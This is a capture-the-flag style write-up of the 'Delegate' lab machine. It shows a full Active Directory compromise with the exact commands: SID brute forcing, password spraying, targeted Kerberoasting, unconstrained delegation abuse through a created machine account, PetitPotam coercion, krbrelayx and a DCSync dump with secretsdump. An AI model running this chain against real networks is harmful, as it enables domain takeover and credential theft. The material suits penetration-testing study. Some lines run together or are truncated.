Delegate is a medium rated machine which consisted of enumerating smb shares to find credentials of a user which had GenericWrite over a user object which was abused through Targeted Kerberoasting, having SeEnableDelegation privilege this lead to Unconstrained Delegation and then performing DCsync.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec
135/tcp open msrpc Microsoft Windows RPC
139/tcp open tcpwrapped
445/tcp open tcpwrapped
464/tcp open tcpwrapped
3389/tcp open tcpwrapped
| ssl-cert: Subject: commonName=DC1.delegate.vl
| Issuer: commonName=DC1.delegate.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-09-30T15:47:02
| Not valid after: 2024-03-31T15:47:02
| MD5: 3a340b861cd985281f509d995bef9f4a
|_SHA-1: ccc740dd30a643bfc26e0b7f5d018da28d7e1630
5985/tcp openEnumerating smb with anonymous user doesn’t show any interesting shares
We can however enumerate domain users with lookupsid using a guest account by brute forcing SIDs
lookupsid.py guest@delegate.vl 10000Having the domain users, we can check if there’s any account having pre-authentication disabled which can lead to AS-REP roasting
Going back to shares and accessing SYSVOL , we can find users.bat file having a password
Spraying this password on the users we have confirms that this password belongs A.Briggs
Running python-bloodhound to enumerate the domain
python3 bloodhound.py -d 'delegate.vl' -u 'A.Briggs' -p 'P4ssw0rd1#123' -c all -ns 10.10.70.255From bloodhound we can see A.Briggs has GenericWrite on N.thompson
This can abuse either through Shadow credentials or associating a SPN to N.Thompson for Targeted kerberoasting, I tried to add shadow credentials by editing msDS-KeyCredentialLink but due to PKINT not being supported by DC it didn't worked
Attempting to perform targeted kerberoasting
python3 /opt/targetedKerberoast/targetedKerberoast.py -u 'A.Briggs' -p 'P4ssw0rd1#123' --request-user N.Thompson -d 'delegate.vl'Cracking the hash with hashcat
Since N.Thompson has CanPSRemote we can login through WinRM
This user belongs to Delegation Admins but there wasn't ACLs on bloodhound for that group
Checking privileges of this user shows that it has SeEnableDelegationPrivilege enabled
This means that we can abuse unconstrained delegation by creating machine account and append a SPN to it, before that we need to make sure if machine quota isn’t 0
First creating a machine account with addcomputer.py
addcomputer.py -dc-ip 10.10.70.255 -computer-pass TestPassword321 -computer-name UwU delegate.vl/N.Thompson:'KALEB_2341'Adding DNS record for the machine account we created
python3 dnstool.py -u 'delegate.vl\UwU$' -p TestPassword321 -r UwU.delegate.vl -d 10.8.0.136 --action add DC1.delegate.vl -dns-ip 10.10.70.255To abuse unconstrained delegation the machine account needs to have a SPN and TRUSTED_FOR_DELEGATION UAC, using bloodyAD we can add the UAC
python3 /opt/bloodyAD/bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATIONAppending SPN with addspn via msDS-AdditionalDnsHostName
python3 ./addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip 10.10.85.247 DC1.delegate.vl --additional
python3 ./addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip 10.10.85.247 DC1.delegate.vNow running krbrelayx first by coercing authentication (using any poc i.e petipotam, printerbug, dfscoerce ) from DC1 to our added machine with unconstrained delegation enabled, this will grab the copy of DC1’s TGT which gets stored in the memory of machine account h for the purpose of accessing resources which can be abused to perform DCsync
python3 PetitPotam.py -u 'UwU$' -p 'TestPassword321' UwU.delegate.vl 10.10.85.247python3 ./krbrelayx.py -hashes :C7BE3644A2EB37C9BB1F248E9E0B9AFCHaving the ticket, we can export it and perform dcsync hashes with secretsdump
secretsdump.py 'DC1$'@DC1.delegate.vl -k -no-passReferences
- https://www.thehacker.recipes/a-d/movement/dacl/targeted-kerberoasting
- https://exploit.ph/user-constrained-delegation.html
- https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/
- https://github.com/CravateRouge/bloodyAD
- https://medium.com/r3d-buck3t/attacking-kerberos-unconstrained-delegation-ef77e1fb7203
